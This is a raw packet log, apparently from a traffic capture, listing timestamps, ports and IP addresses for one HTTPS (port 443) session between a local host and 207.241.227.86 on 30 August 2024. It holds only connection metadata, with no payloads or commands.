Aug 30, 2024 10:38:56.121030092 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.121047020 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.156708956 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.156728029 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.156796932 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.156831980 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.156871080 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.181210041 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.181236982 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.181330919 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.181350946 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.181390047 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.181555033 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.181571960 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.181601048 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.181610107 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.181632996 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.181647062 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.210366964 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210385084 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210581064 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210588932 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.210611105 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210630894 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.210639954 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210655928 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.210664034 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210686922 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.210702896 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.210947037 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.210964918 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211018085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.211025953 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211071968 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.211298943 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211319923 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211349010 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.211354971 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211376905 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.211393118 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.211596966 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211613894 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211654902 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.211662054 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.211697102 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.247243881 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.247263908 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.247502089 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.247524977 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.247574091 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.272259951 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.272288084 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.272370100 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.272388935 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.272406101 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.272428989 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.272470951 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.272531033 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.272542953 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.272599936 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301177025 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301202059 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301435947 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301453114 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301472902 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301498890 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301508904 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301520109 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301536083 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301565886 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301682949 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301703930 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301731110 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301737070 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.301754951 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.301775932 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.302064896 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.302090883 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.302122116 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.302130938 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.302145004 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.302171946 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.302572966 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.302593946 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.302622080 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.302627087 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.302653074 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.302666903 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.338148117 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.338175058 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.338350058 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.338375092 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.338423014 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.363059998 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.363095999 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.363172054 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.363185883 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.363200903 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.363223076 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.363306999 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.363338947 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.363363028 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.363369942 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.363395929 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.363410950 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.391840935 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.391861916 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.391998053 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.392016888 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392108917 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.392195940 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392211914 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392257929 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.392271996 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392298937 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.392316103 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.392498016 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392513990 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392596006 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.392605066 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.392651081 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.393002987 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.393019915 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.393065929 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.393074989 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.393110991 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.393245935 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.393274069 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.393299103 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.393307924 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.393328905 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.393345118 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.429337978 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.429357052 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.429469109 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.429491997 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.429539919 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.454016924 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.454036951 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.454181910 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.454205036 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.454252005 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.454374075 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.454390049 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.454452038 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.454461098 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.454509974 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.484466076 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.484509945 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.484586954 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.484608889 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.484625101 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.484648943 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.484724998 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.484740973 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.484769106 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.484776974 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.484800100 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.484814882 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485117912 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485131979 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485187054 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485196114 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485233068 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485372066 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485387087 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485445023 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485454082 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485505104 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485632896 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485651970 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485686064 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485692024 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.485716105 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.485730886 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.519972086 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.519994974 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.520097017 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.520123959 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.520164967 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.544866085 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.544886112 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.544965982 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.544989109 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.545032024 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.545142889 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.545164108 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.545217991 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.545226097 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.545267105 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.575401068 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.575419903 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.575645924 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.575669050 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.575720072 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.575730085 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.575752020 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.575793028 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.575800896 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.575846910 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576092958 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576112032 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576150894 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576159954 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576194048 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576215982 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576351881 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576374054 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576409101 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576416016 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576447010 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576473951 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576574087 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576605082 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576627016 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576632977 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.576653004 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.576668978 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.610793114 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.610815048 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.610953093 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.610976934 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.611036062 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.636359930 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.636387110 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.636439085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.636466026 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.636486053 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.636503935 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.637408018 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.637424946 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.637485027 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.637501001 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.637545109 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.666708946 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.666728973 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.666898966 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.666923046 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667043924 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.667045116 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.667077065 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667269945 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667284966 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667331934 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.667341948 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667476892 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667545080 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.667546034 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667561054 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667607069 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.667831898 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667849064 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667891979 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.667903900 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.667920113 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.703039885 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.703062057 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.703172922 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.703198910 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727127075 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727149010 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727271080 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.727299929 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727427006 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727452040 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727483988 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.727494955 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.727523088 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.759011984 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.759049892 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.759167910 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.759200096 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.759443998 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.759485960 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.759505987 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.759524107 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.759536982 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.760293961 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.760309935 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.760360956 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.760375023 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.760888100 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.760910988 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.760941029 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.760951996 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.760971069 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.761243105 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.761259079 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.761292934 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.761301041 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.761323929 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.792104006 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.792154074 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.792237043 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.792263031 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.792282104 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.818011045 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.818027973 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.818140984 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.818162918 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.818523884 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.818552017 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.818579912 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.818589926 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.818619967 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.848211050 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848244905 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848330021 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.848356009 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848375082 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.848433971 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848458052 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848489046 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.848495007 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848520994 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.848731041 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848752975 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848788977 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.848797083 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.848819971 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.849323988 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.849351883 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.849384069 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.849400043 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.849412918 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.852238894 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.852274895 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.852303982 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.852319956 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.852333069 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.883153915 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.883199930 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.883284092 CEST	49705	443	192.168.2.8	207.241.227.86
